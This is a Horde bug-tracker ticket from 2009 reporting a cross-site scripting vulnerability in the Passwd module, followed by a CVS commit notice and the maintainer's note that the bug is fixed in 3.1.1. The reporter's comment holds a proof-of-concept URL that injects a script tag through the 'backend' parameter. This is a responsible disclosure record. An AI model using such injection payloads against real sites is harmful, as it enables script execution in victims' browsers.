Tickets :: [#8398] Cross Site Scripting Vulnerability

Summary	Cross Site Scripting Vulnerability
Queue	Passwd
Queue Version	3.1
Type	Bug
State	Resolved
Priority	2. Medium
Owners	chuck (at) horde (dot) org
Requester	security (at) davidwharton (dot) us
Created	07/03/2009 (5795 days ago)
Due
Updated	07/05/2009 (5793 days ago)
Assigned
Resolved	07/05/2009 (5793 days ago)
Milestone
Patch	No

07/05/2009 05:21:51 PM	Chuck Hagenbuch	Comment #3 Assigned to Chuck Hagenbuch State ⇒ Resolved	Reply to this comment
Fixed for 3.1.1 - thanks.

07/05/2009 05:08:47 PM	CVS Commit	Comment #2	Reply to this comment
Changes have been made in CVS for this ticket: http://cvs.horde.org/diff.php/passwd/docs/CHANGES?rt=horde&r1=1.110&r2=1.111&ty=u http://cvs.horde.org/diff.php/passwd/main.php?rt=horde&r1=1.82&r2=1.83&ty=u http://cvs.horde.org/diff.php/passwd/templates/main/main.inc?rt=horde&r1=1.41&r2=1.42&ty=u

07/03/2009 06:45:14 PM	security (at) davidwharton (dot) us	Comment #1 Priority ⇒ 2. Medium Patch ⇒ No Milestone ⇒ Queue ⇒ Passwd Summary ⇒ Cross Site Scripting Vulnerability Type ⇒ Bug State ⇒ Unconfirmed	Reply to this comment
A cross site scripting vulnerability exists. Proof of concept: http://hordeserver.com/horde/passwd/main.php?backend="><!--a75c305b1c0a6022--><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password